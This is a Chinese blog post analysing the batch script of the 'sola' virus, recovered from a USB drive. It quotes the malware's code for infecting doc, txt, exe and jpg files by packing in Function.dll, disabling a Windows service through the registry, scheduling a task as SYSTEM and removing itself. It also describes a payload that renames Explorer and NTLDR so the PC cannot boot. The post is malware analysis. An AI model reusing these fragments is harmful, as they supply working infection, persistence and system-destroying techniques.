| 关键词: nbsp sola systemroot Function RunTime Tasks setup dll vbs regedit |
我是小虫 我手里其实没有sola样本,同学U盘专杀用后,获取了里面的sola.bat 由于没收集到vbs,exe文件未观察到,不做评论 下面看下sola的批处理 其实这段批处理主要分为了 安装,运行,测试,恶意程序启用,自删除修复,我们看看宅男的经典部分 下面是对各个分部的判断 f “%1”==“-Install” goto Install if “%1”==“-Run” goto Run if “%1”==“-Tenbatsu” goto Tenbatsu if “%1”==“-Kill” goto Kill if “%1”==“-Killself” goto Killself 很可惜的是批处理有对电脑系统恶意的vbs,由于不是自己电脑获取,vbs没被收集到 copy %setup%\Function.dll %sola%\Function.dll attrib %sola%\Function.dll +s +h +r rar -m0 -ep -ep1 a %setup%\docpack.dll %sola%\Function.dll rar -m0 -ep -ep1 a %setup%\txtpack.dll %sola%\Function.dll rar -m0 -ep -ep1 a %setup%\exepack.dll %sola%\Function.dll rar -m0 -ep -ep1 a %setup%\jpgpack.dll %sola%\Function.dll del Function.exe 从这里可以看出doc.txt.exe.jpg文件都会被感染,和function.dll整合后然后自我删除Function.exe 安装sleep %A0001% %setup%\sleep.exe %systemroot%\system32\sleep.exe %A0001%被定义为copy 安装regedit,并且注册表里的相应内容 %A0003% Windows Registry Editor Version 5.00>%systemroot%\Fonts\HIDESE~1\Regedit.reg %A0003% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ShellHWDetection]》%systemroot%\Fonts\HIDESE~1\Regedit.reg %A0003% “Start”=dword:00000004》%systemroot%\Fonts\HIDESE~1\Regedit.reg regedit /s %systemroot%\Fonts\HIDESE~1\Regedit.reg RunTimeChk if not exist %sola%\RunTime.txt echo !50>%sola%\RunTime.txt FOR /F “tokens=1 delims=!” %%i in (%sola%\RunTime.txt) do set RunTime=%%i if /i %RunTime% leq 0 goto Virus set /a RunTime=%Runtime%-1 echo !%Runtime%>%sola%\RunTime.txt 检查在sola文件夹里是否存在runtime.txt文件,并且读取里面的内容然后进行判断,当运行50则进入到virus分部里,不存在者进行创立 if exist %systemroot%\Fonts\HIDESE~1\NoTasks if not exist “%runroot%\SOLA.VBS” copy “%sola%\SOLA.VBS” “%runroot%\SOLA.VBS” if not exist %systemroot%\Fonts\HIDESE~1\NoTasks if not exist %Taskroot%\Tasks.job copy %setup%\Tasks.xxx %Taskroot%\Tasks.job&attrib %Taskroot%\Tasks.job +s +h +r&schtasks /change /ru “NT AUTHORITY\SYSTEM” /tn “Tasks” 还会创立tasks.job。tasks.xxx 对于这几个文件由于没有,不知道具体内容 当运行次数达到50次后,可以看到病毒过程 kill过程 会修改(重命名)任务管理器 Explorer,KillNTLDR,并关闭电脑,然后进入不到系统 最后是自删除,对病毒一个自己修复过程吧 :KillSelf :StartExplorer ren %systemroot%\explorer.xxx explorer.exe start %systemroot%\explorer.exe :BackNTLDR attrib %systemdrive%\NTLDR -s -h -r copy /Y %sola%\NTLDR %systemdrive%\NTLDR attrib %systemdrive%\NTLDR +s +h +r :RenTmg ren %systemroot%\system32\taskmgr.xxx taskmgr.exe :KillVirus copy %setup%\KillVirus.txt %sola%\KillVirus.txt C: cd\ md ~Install cd ~Install rar x -hpkakenhi200601 %setup%\SolaKiller.rar mshta “javascript:new ActiveXObject(‘WScript.Shell’)。Run(‘C:\\~Install\\Install.bat %%1',0);window.close()” rd /s /q %setup% attrib %systemroot%\Tasks\Tasks.job -s -h -r del %systemroot%\Tasks\Tasks.job cd “%ALLUSERSPROFILE%\「开始」菜单\程序\启动” if exist sola.vbs del sola.vbs if exist tenbatsu.vbs del tenbatsu.vbs start %systemroot%\system32 otepad.exe %sola%\KillVirus.txt del %sola%\sola.bat Exit 这断批处理就是对上面病毒过程的一个逆向操作 对于sola.vbs tenbastsu.vbskillvirus.txt等没找到 |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|